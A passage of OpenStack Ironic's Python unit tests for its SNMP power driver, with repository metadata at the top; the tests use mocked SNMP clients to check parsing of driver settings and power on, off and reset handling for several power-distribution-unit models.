| 48.317191 | 169 | 0.829416 | 1,081 | 19,955 | 15.139685 | 0.158187 | 0.025541 | 0.011732 | 0.007699 | 0.627765 | 0.610962 | 0.594464 | 0.54546 | 0.541733 | 0.541733 | 0 | 0.419756 | 0.101027 | 19,955 | 412 | 170 | 48.434466 | 0.492558 | 0.001704 | 0 | 0.603774 | 0 | 0 | 0.719056 | 0.566909 | 0 | 1 | 0 | 0 | 0.280323 | 1 | 0.021563 | false | 0 | 0.008086 | 0 | 0.02965 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1c798e912b21323b31dcc25a0c5b4e6061f5b6c9 | 62,750 | py | Python | ironic/tests/unit/drivers/modules/test_snmp.py | hpproliant/ironic | 4f62cd97196b2a0068700ffb17456912147778d0 | [
"Apache-2.0"
] | null | null | null | ironic/tests/unit/drivers/modules/test_snmp.py | hpproliant/ironic | 4f62cd97196b2a0068700ffb17456912147778d0 | [
"Apache-2.0"
] | null | null | null | ironic/tests/unit/drivers/modules/test_snmp.py | hpproliant/ironic | 4f62cd97196b2a0068700ffb17456912147778d0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013,2014 Cray Inc
#
# Authors: David Hewson <dhewson@cray.com>
# Stig Telfer <stelfer@cray.com>
# Mark Goddard <mgoddard@cray.com>
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for SNMP power driver module."""
import time
import mock
from oslo_config import cfg
from pysnmp.entity.rfc3413.oneliner import cmdgen
from pysnmp import error as snmp_error
from ironic.common import exception
from ironic.common import states
from ironic.conductor import task_manager
from ironic.drivers.modules import snmp as snmp
from ironic.tests import base
from ironic.tests.unit.conductor import mgr_utils
from ironic.tests.unit.db import base as db_base
from ironic.tests.unit.db import utils as db_utils
from ironic.tests.unit.objects import utils as obj_utils
CONF = cfg.CONF
INFO_DICT = db_utils.get_test_snmp_info()
@mock.patch.object(cmdgen, 'CommandGenerator', autospec=True)
class SNMPClientTestCase(base.TestCase):
def setUp(self):
super(SNMPClientTestCase, self).setUp()
self.address = '1.2.3.4'
self.port = '6700'
self.oid = 'oid'
self.value = 'value'
def test___init__(self, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V1)
mock_cmdgen.assert_called_once_with()
self.assertEqual(self.address, client.address)
self.assertEqual(self.port, client.port)
self.assertEqual(snmp.SNMP_V1, client.version)
self.assertIsNone(client.community)
self.assertFalse('security' in client.__dict__)
self.assertEqual(mock_cmdgen.return_value, client.cmd_gen)
@mock.patch.object(cmdgen, 'CommunityData', autospec=True)
def test__get_auth_v1(self, mock_community, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V1)
client._get_auth()
mock_cmdgen.assert_called_once_with()
mock_community.assert_called_once_with(client.community, mpModel=0)
@mock.patch.object(cmdgen, 'UsmUserData', autospec=True)
def test__get_auth_v3(self, mock_user, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
client._get_auth()
mock_cmdgen.assert_called_once_with()
mock_user.assert_called_once_with(client.security)
@mock.patch.object(cmdgen, 'UdpTransportTarget', autospec=True)
def test__get_transport(self, mock_transport, mock_cmdgen):
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
client._get_transport()
mock_cmdgen.assert_called_once_with()
mock_transport.assert_called_once_with((client.address, client.port))
@mock.patch.object(cmdgen, 'UdpTransportTarget', autospec=True)
def test__get_transport_err(self, mock_transport, mock_cmdgen):
mock_transport.side_effect = snmp_error.PySnmpError
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(snmp_error.PySnmpError, client._get_transport)
mock_cmdgen.assert_called_once_with()
mock_transport.assert_called_once_with((client.address, client.port))
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_get(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.getCmd.return_value = ("", None, 0, [var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
val = client.get(self.oid)
self.assertEqual(var_bind[1], val)
mock_cmdgenerator.getCmd.assert_called_once_with(mock.ANY, mock.ANY,
self.oid)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_get_err_transport(self, mock_auth, mock_transport, mock_cmdgen):
mock_transport.side_effect = snmp_error.PySnmpError
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.getCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure, client.get, self.oid)
self.assertFalse(mock_cmdgenerator.getCmd.called)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_get_err_engine(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.getCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure, client.get, self.oid)
mock_cmdgenerator.getCmd.assert_called_once_with(mock.ANY, mock.ANY,
self.oid)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_set(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.setCmd.return_value = ("", None, 0, [var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
client.set(self.oid, self.value)
mock_cmdgenerator.setCmd.assert_called_once_with(mock.ANY, mock.ANY,
var_bind)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_set_err_transport(self, mock_auth, mock_transport, mock_cmdgen):
mock_transport.side_effect = snmp_error.PySnmpError
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.setCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure,
client.set, self.oid, self.value)
self.assertFalse(mock_cmdgenerator.setCmd.called)
@mock.patch.object(snmp.SNMPClient, '_get_transport', autospec=True)
@mock.patch.object(snmp.SNMPClient, '_get_auth', autospec=True)
def test_set_err_engine(self, mock_auth, mock_transport, mock_cmdgen):
var_bind = (self.oid, self.value)
mock_cmdgenerator = mock_cmdgen.return_value
mock_cmdgenerator.setCmd.return_value = ("engine error", None, 0,
[var_bind])
client = snmp.SNMPClient(self.address, self.port, snmp.SNMP_V3)
self.assertRaises(exception.SNMPFailure,
client.set, self.oid, self.value)
mock_cmdgenerator.setCmd.assert_called_once_with(mock.ANY, mock.ANY,
var_bind)
class SNMPValidateParametersTestCase(db_base.DbTestCase):
def _get_test_node(self, driver_info):
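        # Build a test node carrying the supplied driver_info.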
return obj_utils.get_test_node(
self.context,
driver_info=driver_info)
def test__parse_driver_info_default(self):
        # Make sure _parse_driver_info() returns the expected values.
node = self._get_test_node(INFO_DICT)
info = snmp._parse_driver_info(node)
self.assertEqual(INFO_DICT['snmp_driver'], info.get('driver'))
self.assertEqual(INFO_DICT['snmp_address'], info.get('address'))
self.assertEqual(INFO_DICT['snmp_port'], str(info.get('port')))
self.assertEqual(INFO_DICT['snmp_outlet'], info.get('outlet'))
self.assertEqual(INFO_DICT['snmp_version'], info.get('version'))
self.assertEqual(INFO_DICT.get('snmp_community'),
info.get('community'))
self.assertEqual(INFO_DICT.get('snmp_security'),
info.get('security'))
def test__parse_driver_info_apc(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc', info.get('driver'))
def test__parse_driver_info_apc_masterswitch(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc_masterswitch')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc_masterswitch', info.get('driver'))
def test__parse_driver_info_apc_masterswitchplus(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc_masterswitchplus')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc_masterswitchplus', info.get('driver'))
def test__parse_driver_info_apc_rackpdu(self):
# Make sure the APC driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='apc_rackpdu')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('apc_rackpdu', info.get('driver'))
def test__parse_driver_info_aten(self):
# Make sure the Aten driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='aten')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('aten', info.get('driver'))
def test__parse_driver_info_cyberpower(self):
# Make sure the CyberPower driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='cyberpower')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('cyberpower', info.get('driver'))
def test__parse_driver_info_eatonpower(self):
# Make sure the Eaton Power driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='eatonpower')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('eatonpower', info.get('driver'))
def test__parse_driver_info_teltronix(self):
# Make sure the Teltronix driver type is parsed.
info = db_utils.get_test_snmp_info(snmp_driver='teltronix')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('teltronix', info.get('driver'))
def test__parse_driver_info_snmp_v1(self):
# Make sure SNMPv1 is parsed with a community string.
info = db_utils.get_test_snmp_info(snmp_version='1',
snmp_community='public')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('1', info.get('version'))
self.assertEqual('public', info.get('community'))
def test__parse_driver_info_snmp_v2c(self):
# Make sure SNMPv2c is parsed with a community string.
info = db_utils.get_test_snmp_info(snmp_version='2c',
snmp_community='private')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('2c', info.get('version'))
self.assertEqual('private', info.get('community'))
def test__parse_driver_info_snmp_v3(self):
# Make sure SNMPv3 is parsed with a security string.
info = db_utils.get_test_snmp_info(snmp_version='3',
snmp_security='pass')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('3', info.get('version'))
self.assertEqual('pass', info.get('security'))
def test__parse_driver_info_snmp_port_default(self):
        # Make sure the default SNMP UDP port number is used.
info = dict(INFO_DICT)
del info['snmp_port']
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual(161, info.get('port'))
def test__parse_driver_info_snmp_port(self):
        # Make sure a non-default SNMP UDP port number can be configured.
info = db_utils.get_test_snmp_info(snmp_port='10161')
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual(10161, info.get('port'))
def test__parse_driver_info_missing_driver(self):
# Make sure exception is raised when the driver type is missing.
info = dict(INFO_DICT)
del info['snmp_driver']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_invalid_driver(self):
# Make sure exception is raised when the driver type is invalid.
info = db_utils.get_test_snmp_info(snmp_driver='invalidpower')
node = self._get_test_node(info)
self.assertRaises(exception.InvalidParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_address(self):
# Make sure exception is raised when the address is missing.
info = dict(INFO_DICT)
del info['snmp_address']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_outlet(self):
# Make sure exception is raised when the outlet is missing.
info = dict(INFO_DICT)
del info['snmp_outlet']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_default_version(self):
# Make sure version defaults to 1 when it is missing.
info = dict(INFO_DICT)
del info['snmp_version']
node = self._get_test_node(info)
info = snmp._parse_driver_info(node)
self.assertEqual('1', info.get('version'))
self.assertEqual(INFO_DICT['snmp_community'], info.get('community'))
def test__parse_driver_info_invalid_version(self):
# Make sure exception is raised when version is invalid.
info = db_utils.get_test_snmp_info(snmp_version='42',
snmp_community='public',
snmp_security='pass')
node = self._get_test_node(info)
self.assertRaises(exception.InvalidParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_default_version_and_missing_community(self):
# Make sure exception is raised when version and community are missing.
info = dict(INFO_DICT)
del info['snmp_version']
del info['snmp_community']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_community_snmp_v1(self):
# Make sure exception is raised when community is missing with SNMPv1.
info = dict(INFO_DICT)
del info['snmp_community']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_community_snmp_v2c(self):
# Make sure exception is raised when community is missing with SNMPv2c.
info = db_utils.get_test_snmp_info(snmp_version='2c')
del info['snmp_community']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
def test__parse_driver_info_missing_security(self):
# Make sure exception is raised when security is missing with SNMPv3.
info = db_utils.get_test_snmp_info(snmp_version='3')
del info['snmp_security']
node = self._get_test_node(info)
self.assertRaises(exception.MissingParameterValue,
snmp._parse_driver_info,
node)
@mock.patch.object(snmp, '_get_client', autospec=True)
class SNMPDeviceDriverTestCase(db_base.DbTestCase):
"""Tests for the SNMP device-specific driver classes.
The SNMP client object is mocked to allow various error cases to be tested.
"""
def setUp(self):
super(SNMPDeviceDriverTestCase, self).setUp()
self.node = obj_utils.get_test_node(
self.context,
driver='fake_snmp',
driver_info=INFO_DICT)
def _update_driver_info(self, **kwargs):
self.node["driver_info"].update(**kwargs)
def _set_snmp_driver(self, snmp_driver):
self._update_driver_info(snmp_driver=snmp_driver)
def _get_snmp_failure(self):
return exception.SNMPFailure(operation='test-operation',
error='test-error')
def test_power_state_on(self, mock_get_client):
# Ensure the power on state is queried correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def test_power_state_off(self, mock_get_client):
# Ensure the power off state is queried correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
def test_power_state_error(self, mock_get_client):
# Ensure an unexpected power state returns an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.ERROR, pstate)
def test_power_state_snmp_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a query are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_state)
mock_client.get.assert_called_once_with(driver._snmp_oid())
def test_power_on(self, mock_get_client):
# Ensure the device is powered on correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def test_power_off(self, mock_get_client):
# Ensure the device is powered off correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_on_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the state to change following a power on
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_off_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the state to change following a power off
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_on,
driver.value_power_off]
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_OFF, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_on_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power on
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_off_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power off
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
def test_power_on_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power on set operation
# are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_on)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
def test_power_off_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power off set
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_off)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
def test_power_on_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power on get operation
# are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_on)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
mock_client.get.assert_called_once_with(driver._snmp_oid())
def test_power_off_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a power off get
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_off)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_on_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power on consistency poll timeout causes an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_on()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_on)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_off_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power off consistency poll timeout causes an error
mock_client = mock_get_client.return_value
CONF.snmp.power_timeout = 5
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_off()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
def test_power_reset(self, mock_get_client):
# Ensure the device is reset correctly
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the power off state change following a power
# reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_on,
driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 3
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_on_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for the power on state change following a power
# reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 3
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_delay_on_delay(self, mock_sleep, mock_get_client):
# Ensure driver waits for both state changes following a power reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_on,
driver.value_power_off,
driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 4
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power off during a reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = 42
pstate = driver.power_reset()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_on_invalid_state(self, mock_sleep, mock_get_client):
# Ensure driver retries when querying unexpected states following a
# power on during a reset
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
attempts = CONF.snmp.power_timeout // driver.retry_interval
mock_client.get.side_effect = ([driver.value_power_off] +
[42] * attempts)
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * (1 + attempts)
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_off_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power off consistency poll timeout during a reset
# causes an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_reset()
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
attempts = CONF.snmp.power_timeout // driver.retry_interval
calls = [mock.call(driver._snmp_oid())] * attempts
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
@mock.patch("eventlet.greenthread.sleep", autospec=True)
def test_power_reset_on_timeout(self, mock_sleep, mock_get_client):
# Ensure that a power on consistency poll timeout during a reset
# causes an error
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
attempts = CONF.snmp.power_timeout // driver.retry_interval
mock_client.get.side_effect = ([driver.value_power_off] *
(1 + attempts))
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * (1 + attempts)
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.ERROR, pstate)
def test_power_reset_off_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power off set
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
self.assertFalse(mock_client.get.called)
def test_power_reset_off_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power off get
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = self._get_snmp_failure()
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
mock_client.set.assert_called_once_with(driver._snmp_oid(),
driver.value_power_off)
mock_client.get.assert_called_once_with(driver._snmp_oid())
def test_power_reset_on_snmp_set_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power on set
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.set.side_effect = [None, self._get_snmp_failure()]
mock_client.get.return_value = driver.value_power_off
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
mock_client.get.assert_called_once_with(driver._snmp_oid())
@mock.patch.object(time, 'sleep', autospec=True)
def test_power_reset_delay_option(self, mock_sleep, mock_get_client):
# Test for 'reboot_delay' config option
self.config(reboot_delay=5, group='snmp')
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
driver.value_power_on]
pstate = driver.power_reset()
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid())] * 2
mock_client.get.assert_has_calls(calls)
self.assertEqual(states.POWER_ON, pstate)
mock_sleep.assert_called_once_with(5)
def test_power_reset_on_snmp_get_failure(self, mock_get_client):
# Ensure SNMP failure exceptions raised during a reset power on get
# operation are propagated
mock_client = mock_get_client.return_value
driver = snmp._get_driver(self.node)
mock_client.get.side_effect = [driver.value_power_off,
self._get_snmp_failure()]
self.assertRaises(exception.SNMPFailure,
driver.power_reset)
calls = [mock.call(driver._snmp_oid(), driver.value_power_off),
mock.call(driver._snmp_oid(), driver.value_power_on)]
mock_client.set.assert_has_calls(calls)
calls = [mock.call(driver._snmp_oid()), mock.call(driver._snmp_oid())]
mock_client.get.assert_has_calls(calls)
def _test_simple_device_power_state_on(self, snmp_driver, mock_get_client):
# Ensure a simple device driver queries power on correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_on
pstate = driver.power_state()
mock_client.get.assert_called_once_with(driver._snmp_oid())
self.assertEqual(states.POWER_ON, pstate)
def _test_simple_device_power_state_off(self, snmp_driver,
mock_get_client):
# Ensure a simple device driver queries power off correctly
mock_client = mock_get_client.return_value
self._set_snmp_driver(snmp_driver)
driver = snmp._get_driver(self.node)
mock_client.get.return_value = driver.value_power_off
pstate = driver.power_state()
